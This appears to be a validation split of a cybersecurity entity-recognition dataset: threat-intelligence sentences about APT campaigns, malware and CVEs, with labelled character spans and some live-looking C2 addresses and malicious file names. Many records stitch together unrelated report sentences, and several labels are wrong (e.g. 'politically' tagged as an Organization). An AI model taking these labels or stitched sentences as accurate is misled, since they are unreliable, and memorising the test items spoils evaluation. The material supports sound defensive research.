{"text": "They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . Sometimes , however , certain samples made use of domain names for HTTP communication .", "spans": {}, "info": {"id": "cyberner_stix_valid_000186", "source": "cyberner_stix_valid"}}
{"text": "This is only a small picture of the threat actor 's operations . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation . We have evidence suggesting that APT1 manually controls thousands of systems in support of their attacks , and have directly observed their control over hundreds of these systems . It can range from asking “ customers ” to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": {"Organization: Symantec": [[197, 205]]}, "info": {"id": "cyberner_stix_valid_000187", "source": "cyberner_stix_valid"}}
{"text": "Educate users about the risks of spearphishing emails .", "spans": {}, "info": {"id": "cyberner_stix_valid_000188", "source": "cyberner_stix_valid"}}
{"text": "] site/gate_cb8a5aea1ab302f0_c online 208.91.197 [ . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report .", "spans": {"Malware: .NET module": [[69, 80]], "Malware: KopiLuwak JavaScript": [[105, 125]], "Malware: DownPaper": [[214, 223]], "Malware: malware": [[224, 231]]}, "info": {"id": "cyberner_stix_valid_000189", "source": "cyberner_stix_valid"}}
{"text": "On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails .", "spans": {"Organization: financial": [[133, 142]], "Organization: high-tech companies": [[147, 166]]}, "info": {"id": "cyberner_stix_valid_000190", "source": "cyberner_stix_valid"}}
{"text": "The main infection vector is a phishing attack using SMS/MMS . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . Since this malware dates back to around 2004 , there are many samples containing CNC URLs from the 3322.org page . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": {"Vulnerability: CVE-2017-7269": [[79, 92]], "Indicator: 3322.org": [[315, 323]], "System: The HyperText Transfer Protocol ( HTTP )": [[331, 371]]}, "info": {"id": "cyberner_stix_valid_000191", "source": "cyberner_stix_valid"}}
{"text": "Report_URL : https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", "spans": {}, "info": {"id": "cyberner_stix_valid_000192", "source": "cyberner_stix_valid"}}
{"text": "Missing permissions The lack of the READ_FRAME_BUFFER permission can be justified by the removal of the screen record feature . executable compilation times suggest early 2012 . RIPTIDE ’s first communication with its C2 server fetches an encryption key , and the RC4 encryption key is used to encrypt all further communication . Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.[22][23 ]", "spans": {"Malware: RIPTIDE": [[178, 185]], "Malware: Magic Hound malware": [[330, 349]]}, "info": {"id": "cyberner_stix_valid_000193", "source": "cyberner_stix_valid"}}
{"text": "The initial attack vector leveraged a phishing email , using the subject line of Upcoming Defense events February 2018 and a sender address claiming to be from Jane ’s 360 defense events events@ihsmarkit.com .", "spans": {"Organization: Upcoming Defense": [[81, 97]], "Organization: 360": [[168, 171]], "Indicator: events@ihsmarkit.com": [[187, 207]]}, "info": {"id": "cyberner_stix_valid_000194", "source": "cyberner_stix_valid"}}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . Ordnance will be able to immediately generate shellcode after users provide the IP and PROT that the shellcode should connect to or listen on .", "spans": {"Vulnerability: CVE-2017-10271": [[110, 124]], "Indicator: Ordnance": [[258, 266]], "Indicator: shellcode": [[359, 368]]}, "info": {"id": "cyberner_stix_valid_000195", "source": "cyberner_stix_valid"}}
{"text": "On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"Organization: media": [[47, 52]], "Organization: government agency": [[110, 127]], "Malware: Scout": [[350, 355]]}, "info": {"id": "cyberner_stix_valid_000196", "source": "cyberner_stix_valid"}}
{"text": "Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": {"Organization: government": [[109, 119]], "Organization: financial": [[122, 131]], "Organization: automotive": [[134, 144]], "Organization: media industries": [[151, 167]], "Malware: Infy": [[174, 178]], "Malware: malware": [[179, 186]], "Organization: Iranians": [[206, 214]], "Organization: broadcast journalist": [[294, 314]], "Organization: BBC Persian": [[318, 329]]}, "info": {"id": "cyberner_stix_valid_000197", "source": "cyberner_stix_valid"}}
{"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT . Two files are created for the task at approximately the same time : C:\\Windows\\System32\\Tasks\\At1 and C:\\Windows\\Tasks\\At1.job . The PE file also appeared to be a modification of the Miniduke 's main backdoor module that uses the same Twitter URL as the Java payload .", "spans": {"Indicator: C:\\Windows\\Tasks\\At1.job": [[570, 594]], "Malware: Miniduke 's main backdoor module": [[651, 683]], "Malware: Java payload": [[722, 734]]}, "info": {"id": "cyberner_stix_valid_000198", "source": "cyberner_stix_valid"}}
{"text": "Report_URL : https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", "spans": {}, "info": {"id": "cyberner_stix_valid_000199", "source": "cyberner_stix_valid"}}
{"text": "FakeSpy masquerades as legitimate postal service apps and transportation services in order to gain the users ' trust . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 .", "spans": {"Malware: FakeSpy": [[0, 7]], "Organization: Rapid7": [[119, 125]], "Malware: ccSEUPDT.exe": [[171, 183]]}, "info": {"id": "cyberner_stix_valid_000200", "source": "cyberner_stix_valid"}}
{"text": "Eleven of the links were clicked once , four were clicked twice , two were clicked three times , and two were clicked four times .", "spans": {}, "info": {"id": "cyberner_stix_valid_000201", "source": "cyberner_stix_valid"}}
{"text": "Malware Testing Environment Tied to TEMP.Veles .", "spans": {}, "info": {"id": "cyberner_stix_valid_000202", "source": "cyberner_stix_valid"}}
{"text": "In the lab , we changed our Quasar RAT source code to use the known encryption key , and to send fake victim IP address , City , Country code , Flag , and Username .", "spans": {"Malware: Quasar RAT": [[28, 38]]}, "info": {"id": "cyberner_stix_valid_000203", "source": "cyberner_stix_valid"}}
{"text": "Patch applications and operating systems .", "spans": {}, "info": {"id": "cyberner_stix_valid_000204", "source": "cyberner_stix_valid"}}
{"text": "First , an activity named MainActivity fires up , taking care of hiding the icon and showing the fake notification . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . Winnti malware handles outbound communications using multiple protocols including : ICMP , HTTP , as well as custom TCP and UDP protocols .", "spans": {"Malware: Winnti": [[293, 299]]}, "info": {"id": "cyberner_stix_valid_000205", "source": "cyberner_stix_valid"}}
{"text": "Beaconing information The ID is generated for each installation of the malware , while the token remains unique . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . January 2019 sent via 149.28.156.61 to deliver either Derusbi or KHRat samples with either cswksfwq.kfesv.xyz or connect.bafunpda.xyz as C2 . LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": {"Organization: politically": [[170, 181]], "Indicator: 149.28.156.61": [[284, 297]], "Malware: Derusbi": [[316, 323]], "Malware: KHRat": [[327, 332]], "Indicator: cswksfwq.kfesv.xyz": [[353, 371]], "Indicator: connect.bafunpda.xyz": [[375, 395]]}, "info": {"id": "cyberner_stix_valid_000206", "source": "cyberner_stix_valid"}}
{"text": "Worryingly , some of the modifications enforced by the spyware might expose the infected devices to further compromise or data tampering . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government . The Exfiltration , however , is done via other cloud providers . However , the problem in general with labeling every ransomware attack as sophisticated is that it excuses the organization that has nt followed the basic preventative best practices .", "spans": {"Organization: government": [[238, 248]]}, "info": {"id": "cyberner_stix_valid_000207", "source": "cyberner_stix_valid"}}
{"text": "A particularly interesting aspect of one of the two documents we analyzed was the filename used , crash list ( Lion Air Boeing 737 ).docx .", "spans": {"Indicator: crash list ( Lion Air Boeing 737 ).docx": [[98, 137]]}, "info": {"id": "cyberner_stix_valid_000208", "source": "cyberner_stix_valid"}}
{"text": "The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign .", "spans": {"Organization: social engineering": [[181, 199]], "Organization: Unit 42": [[202, 209]], "Malware: Bookworm": [[258, 266]]}, "info": {"id": "cyberner_stix_valid_000209", "source": "cyberner_stix_valid"}}
{"text": "Specifically , the threat group used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"Organization: Microsoft": [[96, 105], [209, 218]], "System: Windows": [[106, 113], [219, 226]], "Vulnerability: CVE-2014-6332": [[156, 169]]}, "info": {"id": "cyberner_stix_valid_000210", "source": "cyberner_stix_valid"}}
{"text": "TG-3390 is known for compromising organizations via SWCs and moving quickly to install backdoors on Exchange servers .", "spans": {}, "info": {"id": "cyberner_stix_valid_000211", "source": "cyberner_stix_valid"}}
{"text": "Although there was no evidence of the group using the malware , the threat actors may have leveraged its access or capabilities during earlier phases of the intrusions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000212", "source": "cyberner_stix_valid"}}
{"text": "Cannon email Accounts :", "spans": {"Malware: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_valid_000213", "source": "cyberner_stix_valid"}}
{"text": "Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"Vulnerability: vulnerabilities": [[30, 45]], "Organization: Middle Eastern human rights activist": [[164, 200]]}, "info": {"id": "cyberner_stix_valid_000214", "source": "cyberner_stix_valid"}}
{"text": "The data is first encrypted and then encoded with Base64 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000215", "source": "cyberner_stix_valid"}}
{"text": "How does the malware work without code for these key components ? At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group . Aside from this, there were several other suspicious items we noted: Headers mismatched: The Reply-To and From email address were . But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": {"Vulnerability: CVE-2023 - 34362": [[434, 450]]}, "info": {"id": "cyberner_stix_valid_000216", "source": "cyberner_stix_valid"}}
{"text": "Sofacy ’s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group ’s activities in 2016 , especially when data from the compromise was leaked and “ weaponized ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000217", "source": "cyberner_stix_valid"}}
{"text": "The function main uses a DES encryption algorithm to encode these addresses . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks .", "spans": {"Vulnerability: CVE-2017-11882": [[267, 281]], "Organization: FireEye": [[396, 403]]}, "info": {"id": "cyberner_stix_valid_000218", "source": "cyberner_stix_valid"}}
{"text": "Having analyzed a few variants of the malware , we noticed that the private key was exposed in the code and did not change . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . Symantec detects this threat as Backdoor.Nidiran .", "spans": {"Organization: Symantec": [[403, 411]], "Indicator: Backdoor.Nidiran": [[435, 451]]}, "info": {"id": "cyberner_stix_valid_000219", "source": "cyberner_stix_valid"}}
{"text": "The investigation uncovered that an actor had used these devices to gain initial access to corporate networks .", "spans": {}, "info": {"id": "cyberner_stix_valid_000220", "source": "cyberner_stix_valid"}}
{"text": "A third , similar , CosmicDuke campaign was observed presumably targeting Georgian entities since it used an attachment with a Georgian-language name that translates to “ NATO consolidates control of the Black Sea.docx ” .", "spans": {"Malware: CosmicDuke": [[20, 30]], "Indicator: NATO consolidates control of the Black Sea.docx": [[171, 218]]}, "info": {"id": "cyberner_stix_valid_000221", "source": "cyberner_stix_valid"}}
{"text": "To surface its ransom note , it uses a series of techniques that take advantage of the following components on Android : The “ call ” notification , among several categories of notifications that Android supports , which requires immediate user attention . All contain the same Visual Basic macro code and author name as Honeybee . After the check , Pikabot is a new malware first seen in early 2023 .", "spans": {"System: Android": [[111, 118], [196, 203]], "Malware: Pikabot": [[350, 357]]}, "info": {"id": "cyberner_stix_valid_000222", "source": "cyberner_stix_valid"}}
{"text": "But there 's little stopping it from doing much worse . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing . APT33 : 8.26.21.220 [REDACTED].ddns.net . One possibility is that such claims were made disingenuously as an attempt to establish KillNet 's credibility and/or as a means to distance the group from the Russian government .", "spans": {"Organization: CTU": [[56, 59]], "Indicator: 8.26.21.220": [[197, 208]], "Indicator: [REDACTED].ddns.net": [[209, 228]], "Organization: the Russian government .": [[387, 411]]}, "info": {"id": "cyberner_stix_valid_000223", "source": "cyberner_stix_valid"}}
{"text": "BOSS SPIDER used both enterprise and per-host pricing during their campaigns . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails .", "spans": {"Malware: Microsoft Exchange": [[137, 155]], "Malware: Lotus Domino email servers": [[159, 185]]}, "info": {"id": "cyberner_stix_valid_000224", "source": "cyberner_stix_valid"}}
{"text": "The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . The Gh0st downloaders employ simple substitution ciphers for hiding strings .", "spans": {"Organization: Rapid7": [[243, 249]], "Malware: Gh0st": [[368, 373]]}, "info": {"id": "cyberner_stix_valid_000225", "source": "cyberner_stix_valid"}}
{"text": "The attacks use Domain Name System ( DNS ) cache poisoning/DNS spoofing , possibly through infringement techniques such as brute-force or dictionary attacks , to distribute and install malicious Android apps . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . Only a small portion of this code is actually used to start the infection , the rest is just junk code .", "spans": {"System: Android": [[195, 202]]}, "info": {"id": "cyberner_stix_valid_000226", "source": "cyberner_stix_valid"}}
{"text": "Although early versions had some basic code and string obfuscation , protection of the third version of the malware was enhanced with the use of payload obfuscation . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . The \" Tick \" group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years .", "spans": {}, "info": {"id": "cyberner_stix_valid_000227", "source": "cyberner_stix_valid"}}
{"text": "however , overall there is wide geographical spread of infections .", "spans": {}, "info": {"id": "cyberner_stix_valid_000228", "source": "cyberner_stix_valid"}}
{"text": "This evidence indicates that the certificate ’s rightful owner either misused it or it had been stolen from them .", "spans": {}, "info": {"id": "cyberner_stix_valid_000229", "source": "cyberner_stix_valid"}}
{"text": "Back in October 2016 , Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice .", "spans": {}, "info": {"id": "cyberner_stix_valid_000230", "source": "cyberner_stix_valid"}}
{"text": "] infokalisi [ . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) . The supplied registration information , which is still visible in public “ whois ” data as of February 3, 2013 . If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": {"Organization: Iranians": [[53, 61]], "Organization: broadcast journalist": [[141, 161]]}, "info": {"id": "cyberner_stix_valid_000231", "source": "cyberner_stix_valid"}}
{"text": "Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": {"Organization: Symantec": [[92, 100]], "Organization: CTU": [[231, 234]], "Indicator: s.txt": [[271, 276]]}, "info": {"id": "cyberner_stix_valid_000232", "source": "cyberner_stix_valid"}}
{"text": "We 've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms , so , unfortunately , it does n't seem that this will change any time soon . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time .", "spans": {"Organization: financial institutions": [[395, 417]]}, "info": {"id": "cyberner_stix_valid_000233", "source": "cyberner_stix_valid"}}
{"text": "The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary , in-house apps to their employees without needing to use the iOS App Store . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors .", "spans": {"Organization: Apple Developer Enterprise": [[4, 30]], "System: iOS": [[162, 165]], "System: App Store": [[166, 175]], "Organization: Microsoft": [[178, 187]], "Vulnerability: SMBv1 vulnerabilities": [[202, 223]], "Malware: POWERSTATS": [[314, 324]]}, "info": {"id": "cyberner_stix_valid_000234", "source": "cyberner_stix_valid"}}
{"text": "However , the persistent presence of Italian language both on the Google Play Store pages as well as inside the spyware code was a clear sign that an Italian actor was behind the creation of this platform . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . When the victims open the document , they are encouraged to click on Enable Content , which causes the embedded malicious macro E-TOOL code to run . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": {"System: Google Play": [[66, 77]], "Malware: Microsoft Word attachment": [[287, 312]], "Vulnerability: CVE-2017-0199": [[345, 358]]}, "info": {"id": "cyberner_stix_valid_000235", "source": "cyberner_stix_valid"}}
{"text": "Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments .", "spans": {"Vulnerability: CVE-2014-6332": [[40, 53]], "Malware: PDF attachments": [[273, 288]]}, "info": {"id": "cyberner_stix_valid_000236", "source": "cyberner_stix_valid"}}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": {"Organization: maritime-related": [[94, 110]], "Organization: engineering firms": [[157, 174]], "Organization: shipping": [[177, 185]], "Organization: transportation": [[190, 204]], "Organization: manufacturing": [[207, 220]], "Organization: defense": [[223, 230]], "Organization: government": [[233, 243]], "Organization: research universities": [[258, 279]], "Indicator: Vietnam.exe": [[396, 407]]}, "info": {"id": "cyberner_stix_valid_000237", "source": "cyberner_stix_valid"}}
{"text": "The various stealth and resilience techniques implemented in the adware show us that the culprit was aware of the malicious nature of the added functionality and attempted to keep it hidden . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data .", "spans": {"Malware: Canhadr/Ndriver": [[221, 236]]}, "info": {"id": "cyberner_stix_valid_000238", "source": "cyberner_stix_valid"}}
{"text": "The Word document usually exploits CVE-2012-0158 . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests .", "spans": {"Malware: Word document": [[4, 17]], "Vulnerability: CVE-2012-0158": [[35, 48]], "Organization: Arbor": [[55, 60]], "Organization: Tibetan groups": [[176, 190]]}, "info": {"id": "cyberner_stix_valid_000239", "source": "cyberner_stix_valid"}}
{"text": "All of these apps are developed by the same framework and hence have the same package name and certificate information as seen in Figure 12. certificate Figure 12 : Package name and certificate information . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . APT17 is a China based threat group that has conducted network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"Organization: law firms": [[436, 445]], "Organization: information technology companies": [[448, 480]], "Organization: mining companies": [[483, 499]]}, "info": {"id": "cyberner_stix_valid_000240", "source": "cyberner_stix_valid"}}
{"text": "These were instead spread using either a malicious Tor node that would trojanize legitimate applications on-the-fly with the OnionDuke toolset , or via torrent files containing previously trojanized versions of legitimate applications .", "spans": {"Malware: OnionDuke": [[125, 134]]}, "info": {"id": "cyberner_stix_valid_000241", "source": "cyberner_stix_valid"}}
{"text": "They would then use the toolset to gather initial information on the victims , before deciding which ones to pursue further .", "spans": {}, "info": {"id": "cyberner_stix_valid_000242", "source": "cyberner_stix_valid"}}
{"text": "We do not know why , but we suspect that it was an attempt to hide the origin of the application . Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . They are both Korean-speaking threat actors and sometimes their victimology overlaps .", "spans": {}, "info": {"id": "cyberner_stix_valid_000243", "source": "cyberner_stix_valid"}}
{"text": "] commediauploader [ . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . That is , this server component receives connections from victim backdoors , displays them to the intruder , and then translates the intruder ’s commands into HTML tags that the victim backdoors read . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": {"Malware: thanks.pps": [[48, 58]], "Malware: ins8376.exe": [[122, 133]], "Malware: mpro324.dll": [[166, 177]], "System: Operating systems": [[382, 399]], "System: system files": [[464, 476]]}, "info": {"id": "cyberner_stix_valid_000244", "source": "cyberner_stix_valid"}}
{"text": "Even though this is not a traditional remote access tool ( RAT ) , this campaign seems to target mainly private users . Attackers can point and click their way through a compromised network and exfiltrate data . This module is used by the backdoor during HTTP/HTTPS communication with the C2 server and has a proxy bypass functionality . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"Vulnerability: ProxyNotShell": [[353, 366]]}, "info": {"id": "cyberner_stix_valid_000245", "source": "cyberner_stix_valid"}}
{"text": "Specifically , the only known infection vector for HammerDuke is to be downloaded and executed by CozyDuke onto a victim that has already been compromised by that toolset .", "spans": {"Malware: HammerDuke": [[51, 61]], "Malware: CozyDuke": [[98, 106]]}, "info": {"id": "cyberner_stix_valid_000246", "source": "cyberner_stix_valid"}}
{"text": "This particular iteration was submitted to VirusTotal on September 16 , 2016 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000247", "source": "cyberner_stix_valid"}}
{"text": "The C2 server domain is linked to Thai food : Nampriknum [ . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia . Some similarities exist across different versions of the Base64 alphabet , which indicates that these are most likely not completely randomly generated . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": {"Organization: critical infrastructure engineering firms": [[219, 260]], "Organization: government agencies": [[263, 282]], "Organization: financial houses": [[285, 301]], "Organization: academia": [[306, 314]], "Organization: CSP": [[511, 514]]}, "info": {"id": "cyberner_stix_valid_000248", "source": "cyberner_stix_valid"}}
{"text": "We believe this indicates a fairly sustained campaign that has gained momentum over recent months . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March .", "spans": {"Malware: MSIL dropper": [[148, 160]], "Malware: Javascript (JS) dropper": [[215, 238]], "Organization: think tank": [[372, 382]]}, "info": {"id": "cyberner_stix_valid_000249", "source": "cyberner_stix_valid"}}
{"text": "This new organization proposed the creation of a more secure Android phone . We were soon able to help investigate another incident involving Lurk . The malware also sets the executable file ’s attributes to “ Hidden. ” Some of the file names the attackers used include : winhlps.exe , acrotry.exe , AcroRd32.exe , Updater.exe . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"System: Android": [[61, 68]], "Indicator: winhlps.exe": [[272, 283]], "Indicator: acrotry.exe": [[286, 297]], "Indicator: AcroRd32.exe": [[300, 312]], "Indicator: Updater.exe": [[315, 326]]}, "info": {"id": "cyberner_stix_valid_000250", "source": "cyberner_stix_valid"}}
{"text": "HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself .", "spans": {"Malware: RIPPER": [[134, 140]], "Organization: ATM vendors": [[211, 222]]}, "info": {"id": "cyberner_stix_valid_000251", "source": "cyberner_stix_valid"}}
{"text": "Information about travel plans and campaign scheduling could provide short-term opportunities for other intelligence operations .", "spans": {}, "info": {"id": "cyberner_stix_valid_000252", "source": "cyberner_stix_valid"}}
{"text": "The group uses spear-phishing emails to compromise its targets and infect them with malware .", "spans": {}, "info": {"id": "cyberner_stix_valid_000253", "source": "cyberner_stix_valid"}}
{"text": "As mentioned in this blog , Sofacy is carrying out parallel campaigns to attack similar targets around the world but with different toolsets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000254", "source": "cyberner_stix_valid"}}
{"text": "Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related .", "spans": {"Malware: White Lambert": [[189, 202]], "Malware: Blue Lambert": [[234, 246]]}, "info": {"id": "cyberner_stix_valid_000255", "source": "cyberner_stix_valid"}}
{"text": "] comkalisi [ . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges . Nevertheless , it is noteworthy that Shanghai appeared in the first known APT1 domain registration , along with a phone number that begins with China ’s “ +86 ” international code . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"Organization: political activist": [[105, 123]], "Organization: British-Iranian": [[201, 216]]}, "info": {"id": "cyberner_stix_valid_000256", "source": "cyberner_stix_valid"}}
{"text": "This is usually done in order to validate the target of a new infection . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls . The actor used the same trick that FireEye in the Flare-On 6 : Challenge 7: They removed the header of the python bytecode . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": {"Malware: XLS-withyourface.xls": [[213, 233]], "Malware: XLS-withyourface – test.xls": [[238, 265]], "Organization: FireEye": [[303, 310]]}, "info": {"id": "cyberner_stix_valid_000257", "source": "cyberner_stix_valid"}}
{"text": "Additional Downeks downloaders connecting to the previously-observed server dw.downloadtesting.com were also found in this attack :", "spans": {"Malware: Downeks": [[11, 18]], "Indicator: dw.downloadtesting.com": [[76, 98]]}, "info": {"id": "cyberner_stix_valid_000258", "source": "cyberner_stix_valid"}}
{"text": "During our investigation of the campaign , we identified a number of global targets across several industries who were attacked in 2015 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000259", "source": "cyberner_stix_valid"}}
{"text": "They were also seen enumerating administrative groups to attempt further exploitation .", "spans": {}, "info": {"id": "cyberner_stix_valid_000260", "source": "cyberner_stix_valid"}}
{"text": "APT28 isn’t the only group targeting travelers .", "spans": {}, "info": {"id": "cyberner_stix_valid_000261", "source": "cyberner_stix_valid"}}
{"text": "The Blackfly attacks share some similarities with the more recent Suckfly attacks .", "spans": {}, "info": {"id": "cyberner_stix_valid_000262", "source": "cyberner_stix_valid"}}
